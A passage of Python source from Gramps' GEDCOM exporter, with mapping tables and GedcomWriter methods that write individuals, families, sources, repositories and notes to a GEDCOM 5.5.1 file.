LdsOrd.STATUS_DNS : "DNS",
LdsOrd.STATUS_INFANT : "INFANT",
LdsOrd.STATUS_PRE_1970 : "PRE-1970",
LdsOrd.STATUS_QUALIFIED : "QUALIFIED",
LdsOrd.STATUS_DNS_CAN : "DNS/CAN",
LdsOrd.STATUS_STILLBORN : "STILLBORN",
LdsOrd.STATUS_SUBMITTED : "SUBMITTED",
LdsOrd.STATUS_UNCLEARED : "UNCLEARED",
}
LANGUAGES = {
'cs' : 'Czech', 'da' : 'Danish', 'nl' : 'Dutch', 'en' : 'English',
'eo' : 'Esperanto', 'fi' : 'Finnish', 'fr' : 'French', 'de' : 'German',
'hu' : 'Hungarian', 'it' : 'Italian', 'lt' : 'Latvian',
'lv' : 'Lithuanian', 'no' : 'Norwegian', 'po' : 'Polish',
'pt' : 'Portuguese', 'ro' : 'Romanian', 'sk' : 'Slovak',
'es' : 'Spanish', 'sv' : 'Swedish', 'ru' : 'Russian', }
#-------------------------------------------------------------------------
#
#
#
#-------------------------------------------------------------------------
MIME2GED = {
"image/bmp" : "bmp",
"image/gif" : "gif",
"image/jpeg" : "jpeg",
"image/x-pcx" : "pcx",
"image/tiff" : "tiff",
"audio/x-wav" : "wav"
}
QUALITY_MAP = {
Citation.CONF_VERY_HIGH : "3",
Citation.CONF_HIGH : "2",
Citation.CONF_LOW : "1",
Citation.CONF_VERY_LOW : "0",
}
PEDIGREE_TYPES = {
ChildRefType.BIRTH : 'birth',
ChildRefType.STEPCHILD: 'Step',
ChildRefType.ADOPTED : 'Adopted',
ChildRefType.FOSTER : 'Foster',
}
NOTES_PER_PERSON = 104 # fudge factor to make progress meter a bit smoother
#-------------------------------------------------------------------------
#
# sort_handles_by_id
#
#-------------------------------------------------------------------------
def sort_handles_by_id(handle_list, handle_to_object):
"""
Sort a list of handles by the Gramps ID.
The function that returns the object from the handle needs to be supplied
so that we get the right object.
"""
sorted_list = []
for handle in handle_list:
obj = handle_to_object(handle)
if obj:
data = (obj.get_gramps_id(), handle)
sorted_list.append(data)
sorted_list.sort()
return sorted_list
#-------------------------------------------------------------------------
#
# breakup
#
#-------------------------------------------------------------------------
def breakup(txt, limit):
"""
Break a line of text into a list of strings that conform to the
maximum length specified, while breaking words in the middle of a word
to avoid issues with spaces.
"""
if limit < 1:
raise ValueError("breakup: unexpected limit: %r" % limit)
data = []
while len(txt) > limit:
# look for non-space pair to break between
# do not break within a UTF-8 byte sequence, i. e. first char >127
idx = limit
while (idx > 0 and (txt[idx - 1].isspace() or txt[idx].isspace() or
ord(txt[idx - 1]) > 127)):
idx -= 1
if idx == 0:
#no words to break on, just break at limit anyway
idx = limit
data.append(txt[:idx])
txt = txt[idx:]
if len(txt) > 0:
data.append(txt)
return data
#-------------------------------------------------------------------------
#
# event_has_subordinate_data
# may want to compare description w/ auto-generated one, and
# if so, treat it same as if it were empty for this purpose
#
#-------------------------------------------------------------------------
def event_has_subordinate_data(event, event_ref):
""" determine if event is empty or not """
if event and event_ref:
return (event.get_description().strip() or
not event.get_date_object().is_empty() or
event.get_place_handle() or
event.get_attribute_list() or
event_ref.get_attribute_list() or
event.get_note_list() or
event.get_citation_list() or
event.get_media_list())
else:
return False
#-------------------------------------------------------------------------
#
# GedcomWriter class
#
#-------------------------------------------------------------------------
class GedcomWriter(UpdateCallback):
"""
The GEDCOM writer creates a GEDCOM file that contains the exported
information from the database. It derives from UpdateCallback
so that it can provide visual feedback via a progress bar if needed.
"""
def __init__(self, database, user, option_box=None):
UpdateCallback.__init__(self, user.callback)
self.dbase = database
self.dirname = None
self.gedcom_file = None
self.progress_cnt = 0
self.setup(option_box)
def setup(self, option_box):
"""
If the option_box is present (GUI interface), then we check the
"private", "restrict", and "cfilter" arguments to see if we need
to apply proxy databases.
"""
if option_box:
option_box.parse_options()
self.dbase = option_box.get_filtered_database(self.dbase, self)
def write_gedcom_file(self, filename):
"""
Write the actual GEDCOM file to the specified filename.
"""
self.dirname = os.path.dirname(filename)
with open(filename, "w", encoding='utf-8') as self.gedcom_file:
person_len = self.dbase.get_number_of_people()
family_len = self.dbase.get_number_of_families()
source_len = self.dbase.get_number_of_sources()
repo_len = self.dbase.get_number_of_repositories()
note_len = self.dbase.get_number_of_notes() / NOTES_PER_PERSON
total_steps = (person_len + family_len + source_len + repo_len +
note_len)
self.set_total(total_steps)
self._header(filename)
self._submitter()
self._individuals()
self._families()
self._sources()
self._repos()
self._notes()
self._writeln(0, "TRLR")
return True
def _writeln(self, level, token, textlines="", limit=72):
"""
Write a line of text to the output file in the form of:
LEVEL TOKEN text
If the line contains newlines, it is broken into multiple lines using
the CONT token. If any line is greater than the limit, it will broken
into multiple lines using CONC.
"""
assert token
if textlines:
# break the line into multiple lines if a newline is found
textlines = textlines.replace('\n\r', '\n')
textlines = textlines.replace('\r', '\n')
# Need to double '@' See Gedcom 5.5 spec 'any_char'
if not textlines.startswith('@'): # avoid xrefs
textlines = textlines.replace('@', '@@')
textlist = textlines.split('\n')
token_level = level
for text in textlist:
# make it unicode so that breakup below does the right thin.
text = str(text)
if limit:
prefix = "\n%d CONC " % (level + 1)
txt = prefix.join(breakup(text, limit))
else:
txt = text
self.gedcom_file.write("%d %s %s\n" %
(token_level, token, txt))
token_level = level + 1
token = "CONT"
else:
self.gedcom_file.write("%d %s\n" % (level, token))
def _header(self, filename):
"""
Write the GEDCOM header.
HEADER:=
n HEAD {1:1}
+1 SOUR <APPROVED_SYSTEM_ID> {1:1}
+2 VERS <VERSION_NUMBER> {0:1}
+2 NAME <NAME_OF_PRODUCT> {0:1}
+2 CORP <NAME_OF_BUSINESS> {0:1} # Not used
+3 <<ADDRESS_STRUCTURE>> {0:1} # Not used
+2 DATA <NAME_OF_SOURCE_DATA> {0:1} # Not used
+3 DATE <PUBLICATION_DATE> {0:1} # Not used
+3 COPR <COPYRIGHT_SOURCE_DATA> {0:1} # Not used
+1 DEST <RECEIVING_SYSTEM_NAME> {0:1*} # Not used
+1 DATE <TRANSMISSION_DATE> {0:1}
+2 TIME <TIME_VALUE> {0:1}
+1 SUBM @XREF:SUBM@ {1:1}
+1 SUBN @XREF:SUBN@ {0:1}
+1 FILE <FILE_NAME> {0:1}
+1 COPR <COPYRIGHT_GEDCOM_FILE> {0:1}
+1 GEDC {1:1}
+2 VERS <VERSION_NUMBER> {1:1}
+2 FORM <GEDCOM_FORM> {1:1}
+1 CHAR <CHARACTER_SET> {1:1}
+2 VERS <VERSION_NUMBER> {0:1}
+1 LANG <LANGUAGE_OF_TEXT> {0:1}
+1 PLAC {0:1}
+2 FORM <PLACE_HIERARCHY> {1:1}
+1 NOTE <GEDCOM_CONTENT_DESCRIPTION> {0:1}
+2 [CONT|CONC] <GEDCOM_CONTENT_DESCRIPTION> {0:M}
"""
local_time = time.localtime(time.time())
(year, mon, day, hour, minutes, sec) = local_time[0:6]
date_str = "%d %s %d" % (day, libgedcom.MONTH[mon], year)
time_str = "%02d:%02d:%02d" % (hour, minutes, sec)
rname = self.dbase.get_researcher().get_name()
self._writeln(0, "HEAD")
self._writeln(1, "SOUR", "Gramps")
self._writeln(2, "VERS", VERSION)
self._writeln(2, "NAME", "Gramps")
self._writeln(1, "DATE", date_str)
self._writeln(2, "TIME", time_str)
self._writeln(1, "SUBM", "@SUBM@")
self._writeln(1, "FILE", filename, limit=255)
self._writeln(1, "COPR", 'Copyright (c) %d %s.' % (year, rname))
self._writeln(1, "GEDC")
self._writeln(2, "VERS", "5.5.1")
self._writeln(2, "FORM", 'LINEAGE-LINKED')
self._writeln(1, "CHAR", "UTF-8")
# write the language string if the current LANG variable
# matches something we know about.
lang = glocale.language[0]
if lang and len(lang) >= 2:
lang_code = LANGUAGES.get(lang[0:2])
if lang_code:
self._writeln(1, 'LANG', lang_code)
def _submitter(self):
"""
n @<XREF:SUBM>@ SUBM {1:1}
+1 NAME <SUBMITTER_NAME> {1:1}
+1 <<ADDRESS_STRUCTURE>> {0:1}
+1 <<MULTIMEDIA_LINK>> {0:M} # not used
+1 LANG <LANGUAGE_PREFERENCE> {0:3} # not used
+1 RFN <SUBMITTER_REGISTERED_RFN> {0:1} # not used
+1 RIN <AUTOMATED_RECORD_ID> {0:1} # not used
+1 <<CHANGE_DATE>> {0:1} # not used
"""
owner = self.dbase.get_researcher()
name = owner.get_name()
phon = owner.get_phone()
mail = owner.get_email()
self._writeln(0, "@SUBM@", "SUBM")
self._writeln(1, "NAME", name)
# Researcher is a sub-type of LocationBase, so get_city etc. which are
# used in __write_addr work fine. However, the database owner street is
# stored in address, so we need to temporarily copy it into street so
# __write_addr works properly
owner.set_street(owner.get_address())
self.__write_addr(1, owner)
if phon:
self._writeln(1, "PHON", phon)
if mail:
self._writeln(1, "EMAIL", mail)
def _individuals(self):
"""
Write the individual people to the gedcom file.
Since people like to have the list sorted by ID value, we need to go
through a sorting step. We need to reset the progress bar, otherwise,
people will be confused when the progress bar is idle.
"""
self.set_text(_("Writing individuals"))
phandles = self.dbase.iter_person_handles()
sorted_list = []
for handle in phandles:
person = self.dbase.get_person_from_handle(handle)
if person:
data = (person.get_gramps_id(), handle)
sorted_list.append(data)
sorted_list.sort()
for data in sorted_list:
self.update()
self._person(self.dbase.get_person_from_handle(data[1]))
def _person(self, person):
"""
Write out a single person.
n @XREF:INDI@ INDI {1:1}
+1 RESN <RESTRICTION_NOTICE> {0:1} # not used
+1 <<PERSONAL_NAME_STRUCTURE>> {0:M}
+1 SEX <SEX_VALUE> {0:1}
+1 <<INDIVIDUAL_EVENT_STRUCTURE>> {0:M}
+1 <<INDIVIDUAL_ATTRIBUTE_STRUCTURE>> {0:M}
+1 <<LDS_INDIVIDUAL_ORDINANCE>> {0:M}
+1 <<CHILD_TO_FAMILY_LINK>> {0:M}
+1 <<SPOUSE_TO_FAMILY_LINK>> {0:M}
+1 SUBM @<XREF:SUBM>@ {0:M}
+1 <<ASSOCIATION_STRUCTURE>> {0:M}
+1 ALIA @<XREF:INDI>@ {0:M}
+1 ANCI @<XREF:SUBM>@ {0:M}
+1 DESI @<XREF:SUBM>@ {0:M}
+1 <<SOURCE_CITATION>> {0:M}
+1 <<MULTIMEDIA_LINK>> {0:M} ,*
+1 <<NOTE_STRUCTURE>> {0:M}
+1 RFN <PERMANENT_RECORD_FILE_NUMBER> {0:1}
+1 AFN <ANCESTRAL_FILE_NUMBER> {0:1}
+1 REFN <USER_REFERENCE_NUMBER> {0:M}
+2 TYPE <USER_REFERENCE_TYPE> {0:1}
+1 RIN <AUTOMATED_RECORD_ID> {0:1}
+1 <<CHANGE_DATE>> {0:1}
"""
if person is None:
return
self._writeln(0, "@%s@" % person.get_gramps_id(), "INDI")
self._names(person)
self._gender(person)
self._person_event_ref('BIRT', person.get_birth_ref())
self._person_event_ref('DEAT', person.get_death_ref())
self._remaining_events(person)
self._attributes(person)
self._lds_ords(person, 1)
self._child_families(person)
self._parent_families(person)
self._assoc(person, 1)
self._person_sources(person)
self._addresses(person)
self._photos(person.get_media_list(), 1)
self._url_list(person, 1)
self._note_references(person.get_note_list(), 1)
self._change(person.get_change_time(), 1)
def _assoc(self, person, level):
"""
n ASSO @<XREF:INDI>@ {0:M}
+1 RELA <RELATION_IS_DESCRIPTOR> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 <<SOURCE_CITATION>> {0:M}
"""
for ref in person.get_person_ref_list():
person = self.dbase.get_person_from_handle(ref.ref)
if person:
self._writeln(level, "ASSO", "@%s@" % person.get_gramps_id())
self._writeln(level + 1, "RELA", ref.get_relation())
self._note_references(ref.get_note_list(), level + 1)
self._source_references(ref.get_citation_list(), level + 1)
def _note_references(self, notelist, level):
"""
Write out the list of note handles to the current level.
We use the Gramps ID as the XREF for the GEDCOM file.
"""
for note_handle in notelist:
note = self.dbase.get_note_from_handle(note_handle)
if note:
self._writeln(level, 'NOTE', '@%s@' % note.get_gramps_id())
def _names(self, person):
"""
Write the names associated with the person to the current level.
Since nicknames in version < 3.3 are separate from the name structure,
we search the attribute list to see if we can find a nickname.
Because we do not know the mappings, we just take the first nickname
we find, and add it to the primary name.
If a nickname is present in the name structure, it has precedence
"""
nicknames = [attr.get_value() for attr in person.get_attribute_list()
if int(attr.get_type()) == AttributeType.NICKNAME]
if len(nicknames) > 0:
nickname = nicknames[0]
else:
nickname = ""
self._person_name(person.get_primary_name(), nickname)
for name in person.get_alternate_names():
self._person_name(name, "")
def _gender(self, person):
"""
Write out the gender of the person to the file.
If the gender is not male or female, simply do not output anything.
The only valid values are M (male) or F (female). So if the geneder is
unknown, we output nothing.
"""
if person.get_gender() == Person.MALE:
self._writeln(1, "SEX", "M")
elif person.get_gender() == Person.FEMALE:
self._writeln(1, "SEX", "F")
def _lds_ords(self, obj, level):
"""
Simply loop through the list of LDS ordinances, and call the function
that writes the LDS ordinance structure.
"""
for lds_ord in obj.get_lds_ord_list():
self.write_ord(lds_ord, level)
def _remaining_events(self, person):
"""
Output all events associated with the person that are not BIRTH or
DEATH events.
Because all we have are event references, we have to
extract the real event to discover the event type.
"""
global adop_written
# adop_written is only shared between this function and
# _process_person_event. This is rather ugly code, but it is difficult
# to support an Adoption event without an Adopted relationship from the
# parent(s), an Adopted relationship from the parent(s) without an
# event, and both an event and a relationship. All these need to be
# supported without duplicating the output of the ADOP GEDCOM tag. See
# bug report 2370.
adop_written = False
for event_ref in person.get_event_ref_list():
event = self.dbase.get_event_from_handle(event_ref.ref)
if not event:
continue
self._process_person_event(person, event, event_ref)
if not adop_written:
self._adoption_records(person, adop_written)
def _process_person_event(self, person, event, event_ref):
"""
Process a person event, which is not a BIRTH or DEATH event.
"""
global adop_written
etype = int(event.get_type())
# if the event is a birth or death, skip it.
if etype in (EventType.BIRTH, EventType.DEATH):
return
role = int(event_ref.get_role())
# if the event role is not primary, skip the event.
if role != EventRoleType.PRIMARY:
return
val = libgedcom.PERSONALCONSTANTEVENTS.get(etype, "").strip()
if val and val.strip():
if val in NEEDS_PARAMETER:
if event.get_description().strip():
self._writeln(1, val, event.get_description())
else:
self._writeln(1, val)
else:
if event_has_subordinate_data(event, event_ref):
self._writeln(1, val)
else:
self._writeln(1, val, 'Y')
if event.get_description().strip():
self._writeln(2, 'TYPE', event.get_description())
else:
descr = event.get_description()
if descr:
self._writeln(1, 'EVEN', descr)
else:
self._writeln(1, 'EVEN')
if val.strip():
self._writeln(2, 'TYPE', val)
else:
self._writeln(2, 'TYPE', str(event.get_type()))
self._dump_event_stats(event, event_ref)
if etype == EventType.ADOPT and not adop_written:
adop_written = True
self._adoption_records(person, adop_written)
def _adoption_records(self, person, adop_written):
"""
Write Adoption events for each child that has been adopted.
n ADOP
+1 <<INDIVIDUAL_EVENT_DETAIL>>
+1 FAMC @<XREF:FAM>@
+2 ADOP <ADOPTED_BY_WHICH_PARENT>
"""
adoptions = []
for family in [self.dbase.get_family_from_handle(fh)
for fh in person.get_parent_family_handle_list()]:
if family is None:
continue
for child_ref in [ref for ref in family.get_child_ref_list()
if ref.ref == person.handle]:
if child_ref.mrel == ChildRefType.ADOPTED \
or child_ref.frel == ChildRefType.ADOPTED:
adoptions.append((family, child_ref.frel, child_ref.mrel))
for (fam, frel, mrel) in adoptions:
if not adop_written:
self._writeln(1, 'ADOP', 'Y')
self._writeln(2, 'FAMC', '@%s@' % fam.get_gramps_id())
if mrel == frel:
self._writeln(3, 'ADOP', 'BOTH')
elif mrel == ChildRefType.ADOPTED:
self._writeln(3, 'ADOP', 'WIFE')
else:
self._writeln(3, 'ADOP', 'HUSB')
def _attributes(self, person):
"""
Write out the attributes to the GEDCOM file.
Since we have already looked at nicknames when we generated the names,
we filter them out here.
We use the GEDCOM 5.5.1 FACT command to write out attributes not
built in to GEDCOM.
"""
# filter out the nicknames
attr_list = [attr for attr in person.get_attribute_list()
if attr.get_type() != AttributeType.NICKNAME]
for attr in attr_list:
attr_type = int(attr.get_type())
name = libgedcom.PERSONALCONSTANTATTRIBUTES.get(attr_type)
key = str(attr.get_type())
value = attr.get_value().strip().replace('\r', ' ')
if key in ("AFN", "RFN", "REFN", "_UID", "_FSFTID"):
self._writeln(1, key, value)
continue
if key == "RESN":
self._writeln(1, 'RESN')
continue
if name and name.strip():
self._writeln(1, name, value)
elif value:
self._writeln(1, 'FACT', value)
self._writeln(2, 'TYPE', key)
else:
continue
self._note_references(attr.get_note_list(), 2)
self._source_references(attr.get_citation_list(), 2)
def _source_references(self, citation_list, level):
"""
Loop through the list of citation handles, writing the information
to the file.
"""
for citation_handle in citation_list:
self._source_ref_record(level, citation_handle)
def _addresses(self, person):
"""
Write out the addresses associated with the person as RESI events.
"""
for addr in person.get_address_list():
self._writeln(1, 'RESI')
self._date(2, addr.get_date_object())
self.__write_addr(2, addr)
if addr.get_phone():
self._writeln(2, 'PHON', addr.get_phone())
self._note_references(addr.get_note_list(), 2)
self._source_references(addr.get_citation_list(), 2)
def _photos(self, media_list, level):
"""
Loop through the list of media objects, writing the information
to the file.
"""
for photo in media_list:
self._photo(photo, level)
def _child_families(self, person):
"""
Write the Gramps ID as the XREF for each family in which the person
is listed as a child.
"""
# get the list of familes from the handle list
family_list = [self.dbase.get_family_from_handle(hndl)
for hndl in person.get_parent_family_handle_list()]
for family in family_list:
if family:
self._writeln(1, 'FAMC', '@%s@' % family.get_gramps_id())
for child in family.get_child_ref_list():
if child.get_reference_handle() == person.get_handle():
if child.frel == ChildRefType.ADOPTED and \
child.mrel == ChildRefType.ADOPTED:
self._writeln(2, 'PEDI adopted')
elif child.frel == ChildRefType.BIRTH and \
child.mrel == ChildRefType.BIRTH:
self._writeln(2, 'PEDI birth')
elif child.frel == ChildRefType.STEPCHILD and \
child.mrel == ChildRefType.STEPCHILD:
self._writeln(2, 'PEDI stepchild')
elif child.frel == ChildRefType.FOSTER and \
child.mrel == ChildRefType.FOSTER:
self._writeln(2, 'PEDI foster')
elif child.frel == child.mrel:
self._writeln(2, 'PEDI Unknown')
else:
self._writeln(2, '_FREL %s' %
PEDIGREE_TYPES.get(child.frel.value,
"Unknown"))
self._writeln(2, '_MREL %s' %
PEDIGREE_TYPES.get(child.mrel.value,
"Unknown"))
def _parent_families(self, person):
"""
Write the Gramps ID as the XREF for each family in which the person
is listed as a parent.
"""
# get the list of familes from the handle list
family_list = [self.dbase.get_family_from_handle(hndl)
for hndl in person.get_family_handle_list()]
for family in family_list:
if family:
self._writeln(1, 'FAMS', '@%s@' % family.get_gramps_id())
def _person_sources(self, person):
"""
Loop through the list of citations, writing the information
to the file.
"""
for citation_handle in person.get_citation_list():
self._source_ref_record(1, citation_handle)
def _url_list(self, obj, level):
"""
For Person's FAX, PHON, EMAIL, WWW lines;
n PHON <PHONE_NUMBER> {0:3}
n EMAIL <ADDRESS_EMAIL> {0:3}
n FAX <ADDRESS_FAX> {0:3}
n WWW <ADDRESS_WEB_PAGE> {0:3}
n OBJE {1:1}
+1 FORM <MULTIMEDIA_FORMAT> {1:1}
+1 TITL <DESCRIPTIVE_TITLE> {0:1}
+1 FILE <MULTIMEDIA_FILE_REFERENCE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
"""
for url in obj.get_url_list():
if url.get_type() == UrlType.EMAIL:
self._writeln(level, 'EMAIL', url.get_path())
elif url.get_type() == UrlType.WEB_HOME:
self._writeln(level, 'WWW', url.get_path())
elif url.get_type() == _('Phone'):
self._writeln(level, 'PHON', url.get_path())
elif url.get_type() == _('FAX'):
self._writeln(level, 'FAX', url.get_path())
else:
self._writeln(level, 'OBJE')
self._writeln(level + 1, 'FORM', 'URL')
if url.get_description():
self._writeln(level + 1, 'TITL', url.get_description())
if url.get_path():
self._writeln(level + 1, 'FILE', url.get_path(), limit=255)
def _families(self):
"""
Write out the list of families, sorting by Gramps ID.
"""
self.set_text(_("Writing families"))
# generate a list of (GRAMPS_ID, HANDLE) pairs. This list
# can then be sorted by the sort routine, which will use the
# first value of the tuple as the sort key.
sorted_list = sort_handles_by_id(self.dbase.get_family_handles(),
self.dbase.get_family_from_handle)
# loop through the sorted list, pulling of the handle. This list
# has already been sorted by GRAMPS_ID
for family_handle in [hndl[1] for hndl in sorted_list]:
self.update()
self._family(self.dbase.get_family_from_handle(family_handle))
def _family(self, family):
"""
n @<XREF:FAM>@ FAM {1:1}
+1 RESN <RESTRICTION_NOTICE> {0:1)
+1 <<FAMILY_EVENT_STRUCTURE>> {0:M}
+1 HUSB @<XREF:INDI>@ {0:1}
+1 WIFE @<XREF:INDI>@ {0:1}
+1 CHIL @<XREF:INDI>@ {0:M}
+1 NCHI <COUNT_OF_CHILDREN> {0:1}
+1 SUBM @<XREF:SUBM>@ {0:M}
+1 <<LDS_SPOUSE_SEALING>> {0:M}
+1 REFN <USER_REFERENCE_NUMBER> {0:M}
"""
if family is None:
return
gramps_id = family.get_gramps_id()
self._writeln(0, '@%s@' % gramps_id, 'FAM')
self._family_reference('HUSB', family.get_father_handle())
self._family_reference('WIFE', family.get_mother_handle())
self._lds_ords(family, 1)
self._family_events(family)
self._family_attributes(family.get_attribute_list(), 1)
self._family_child_list(family.get_child_ref_list())
self._source_references(family.get_citation_list(), 1)
self._photos(family.get_media_list(), 1)
self._note_references(family.get_note_list(), 1)
self._change(family.get_change_time(), 1)
def _family_child_list(self, child_ref_list):
"""
Write the child XREF values to the GEDCOM file.
"""
child_list = [
self.dbase.get_person_from_handle(cref.ref).get_gramps_id()
for cref in child_ref_list]
for gid in child_list:
if gid is None:
continue
self._writeln(1, 'CHIL', '@%s@' % gid)
def _family_reference(self, token, person_handle):
"""
Write the family reference to the file.
This is either 'WIFE' or 'HUSB'. As usual, we use the Gramps ID as the
XREF value.
"""
if person_handle:
person = self.dbase.get_person_from_handle(person_handle)
if person:
self._writeln(1, token, '@%s@' % person.get_gramps_id())
def _family_events(self, family):
"""
Output the events associated with the family.
Because all we have are event references, we have to extract the real
event to discover the event type.
"""
for event_ref in family.get_event_ref_list():
event = self.dbase.get_event_from_handle(event_ref.ref)
if event is None:
continue
self._process_family_event(event, event_ref)
self._dump_event_stats(event, event_ref)
def _process_family_event(self, event, event_ref):
"""
Process a single family event.
"""
etype = int(event.get_type())
val = libgedcom.FAMILYCONSTANTEVENTS.get(etype)
if val:
if event_has_subordinate_data(event, event_ref):
self._writeln(1, val)
else:
self._writeln(1, val, 'Y')
if event.get_type() == EventType.MARRIAGE:
self._family_event_attrs(event.get_attribute_list(), 2)
if event.get_description().strip() != "":
self._writeln(2, 'TYPE', event.get_description())
else:
descr = event.get_description()
if descr:
self._writeln(1, 'EVEN', descr)
else:
self._writeln(1, 'EVEN')
the_type = str(event.get_type())
if the_type:
self._writeln(2, 'TYPE', the_type)
def _family_event_attrs(self, attr_list, level):
"""
Write the attributes associated with the family event.
The only ones we really care about are FATHER_AGE and MOTHER_AGE which
we translate to WIFE/HUSB AGE attributes.
"""
for attr in attr_list:
if attr.get_type() == AttributeType.FATHER_AGE:
self._writeln(level, 'HUSB')
self._writeln(level + 1, 'AGE', attr.get_value())
elif attr.get_type() == AttributeType.MOTHER_AGE:
self._writeln(level, 'WIFE')
self._writeln(level + 1, 'AGE', attr.get_value())
def _family_attributes(self, attr_list, level):
"""
Write out the attributes associated with a family to the GEDCOM file.
Since we have already looked at nicknames when we generated the names,
we filter them out here.
We use the GEDCOM 5.5.1 FACT command to write out attributes not
built in to GEDCOM.
"""
for attr in attr_list:
attr_type = int(attr.get_type())
name = libgedcom.FAMILYCONSTANTATTRIBUTES.get(attr_type)
key = str(attr.get_type())
value = attr.get_value().replace('\r', ' ')
if key in ("AFN", "RFN", "REFN", "_UID"):
self._writeln(1, key, value)
continue
if name and name.strip():
self._writeln(1, name, value)
continue
else:
self._writeln(1, 'FACT', value)
self._writeln(2, 'TYPE', key)
self._note_references(attr.get_note_list(), level + 1)
self._source_references(attr.get_citation_list(),
level + 1)
def _sources(self):
"""
Write out the list of sources, sorting by Gramps ID.
"""
self.set_text(_("Writing sources"))
sorted_list = sort_handles_by_id(self.dbase.get_source_handles(),
self.dbase.get_source_from_handle)
for (source_id, handle) in sorted_list:
self.update()
source = self.dbase.get_source_from_handle(handle)
if source is None:
continue
self._writeln(0, '@%s@' % source_id, 'SOUR')
if source.get_title():
self._writeln(1, 'TITL', source.get_title())
if source.get_author():
self._writeln(1, "AUTH", source.get_author())
if source.get_publication_info():
self._writeln(1, "PUBL", source.get_publication_info())
if source.get_abbreviation():
self._writeln(1, 'ABBR', source.get_abbreviation())
self._photos(source.get_media_list(), 1)
for reporef in source.get_reporef_list():
self._reporef(reporef, 1)
# break
self._note_references(source.get_note_list(), 1)
self._change(source.get_change_time(), 1)
def _notes(self):
"""
Write out the list of notes, sorting by Gramps ID.
"""
self.set_text(_("Writing notes"))
note_cnt = 0
sorted_list = sort_handles_by_id(self.dbase.get_note_handles(),
self.dbase.get_note_from_handle)
for note_handle in [hndl[1] for hndl in sorted_list]:
# the following makes the progress bar a bit smoother
if not note_cnt % NOTES_PER_PERSON:
self.update()
note_cnt += 1
note = self.dbase.get_note_from_handle(note_handle)
if note is None:
continue
self._note_record(note)
def _note_record(self, note):
"""
n @<XREF:NOTE>@ NOTE <SUBMITTER_TEXT> {1:1}
+1 [ CONC | CONT] <SUBMITTER_TEXT> {0:M}
+1 <<SOURCE_CITATION>> {0:M}
+1 REFN <USER_REFERENCE_NUMBER> {0:M}
+2 TYPE <USER_REFERENCE_TYPE> {0:1}
+1 RIN <AUTOMATED_RECORD_ID> {0:1}
+1 <<CHANGE_DATE>> {0:1}
"""
if note:
self._writeln(0, '@%s@' % note.get_gramps_id(),
'NOTE ' + note.get())
def _repos(self):
"""
Write out the list of repositories, sorting by Gramps ID.
REPOSITORY_RECORD:=
n @<XREF:REPO>@ REPO {1:1}
+1 NAME <NAME_OF_REPOSITORY> {1:1}
+1 <<ADDRESS_STRUCTURE>> {0:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 REFN <USER_REFERENCE_NUMBER> {0:M}
+2 TYPE <USER_REFERENCE_TYPE> {0:1}
+1 RIN <AUTOMATED_RECORD_ID> {0:1}
+1 <<CHANGE_DATE>> {0:1}
"""
self.set_text(_("Writing repositories"))
sorted_list = sort_handles_by_id(self.dbase.get_repository_handles(),
self.dbase.get_repository_from_handle)
# GEDCOM only allows for a single repository per source
for (repo_id, handle) in sorted_list:
self.update()
repo = self.dbase.get_repository_from_handle(handle)
if repo is None:
continue
self._writeln(0, '@%s@' % repo_id, 'REPO')
if repo.get_name():
self._writeln(1, 'NAME', repo.get_name())
for addr in repo.get_address_list():
self.__write_addr(1, addr)
if addr.get_phone():
self._writeln(1, 'PHON', addr.get_phone())
for url in repo.get_url_list():
if url.get_type() == UrlType.EMAIL:
self._writeln(1, 'EMAIL', url.get_path())
elif url.get_type() == UrlType.WEB_HOME:
self._writeln(1, 'WWW', url.get_path())
elif url.get_type() == _('FAX'):
self._writeln(1, 'FAX', url.get_path())
self._note_references(repo.get_note_list(), 1)
def _reporef(self, reporef, level):
"""
n REPO [ @XREF:REPO@ | <NULL>] {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 CALN <SOURCE_CALL_NUMBER> {0:M}
+2 MEDI <SOURCE_MEDIA_TYPE> {0:1}
"""
if reporef.ref is None:
return
repo = self.dbase.get_repository_from_handle(reporef.ref)
if repo is None:
return
repo_id = repo.get_gramps_id()
self._writeln(level, 'REPO', '@%s@' % repo_id)
self._note_references(reporef.get_note_list(), level + 1)
if reporef.get_call_number():
self._writeln(level + 1, 'CALN', reporef.get_call_number())
if reporef.get_media_type():
self._writeln(level + 2, 'MEDI', str(reporef.get_media_type()))
def _person_event_ref(self, key, event_ref):
"""
Write out the BIRTH and DEATH events for the person.
"""
if event_ref:
event = self.dbase.get_event_from_handle(event_ref.ref)
if event_has_subordinate_data(event, event_ref):
self._writeln(1, key)
else:
self._writeln(1, key, 'Y')
if event.get_description().strip() != "":
self._writeln(2, 'TYPE', event.get_description())
self._dump_event_stats(event, event_ref)
def _change(self, timeval, level):
"""
CHANGE_DATE:=
n CHAN {1:1}
+1 DATE <CHANGE_DATE> {1:1}
+2 TIME <TIME_VALUE> {0:1}
+1 <<NOTE_STRUCTURE>> # not used
"""
self._writeln(level, 'CHAN')
time_val = time.gmtime(timeval)
self._writeln(level + 1, 'DATE', '%d %s %d' % (
time_val[2], libgedcom.MONTH[time_val[1]], time_val[0]))
self._writeln(level + 2, 'TIME', '%02d:%02d:%02d' % (
time_val[3], time_val[4], time_val[5]))
def _dump_event_stats(self, event, event_ref):
"""
Write the event details for the event, using the event and event
reference information.
GEDCOM does not make a distinction between the two.
"""
dateobj = event.get_date_object()
self._date(2, dateobj)
if self._datewritten:
# write out TIME if present
times = [attr.get_value() for attr in event.get_attribute_list()
if int(attr.get_type()) == AttributeType.TIME]
# Not legal, but inserted by PhpGedView
if len(times) > 0:
self._writeln(3, 'TIME', times[0])
place = None
if event.get_place_handle():
place = self.dbase.get_place_from_handle(event.get_place_handle())
self._place(place, dateobj, 2)
for attr in event.get_attribute_list():
attr_type = attr.get_type()
if attr_type == AttributeType.CAUSE:
self._writeln(2, 'CAUS', attr.get_value())
elif attr_type == AttributeType.AGENCY:
self._writeln(2, 'AGNC', attr.get_value())
elif attr_type == _("Phone"):
self._writeln(2, 'PHON', attr.get_value())
elif attr_type == _("FAX"):
self._writeln(2, 'FAX', attr.get_value())
elif attr_type == _("EMAIL"):
self._writeln(2, 'EMAIL', attr.get_value())
elif attr_type == _("WWW"):
self._writeln(2, 'WWW', attr.get_value())
for attr in event_ref.get_attribute_list():
attr_type = attr.get_type()
if attr_type == AttributeType.AGE:
self._writeln(2, 'AGE', attr.get_value())
elif attr_type == AttributeType.FATHER_AGE:
self._writeln(2, 'HUSB')
self._writeln(3, 'AGE', attr.get_value())
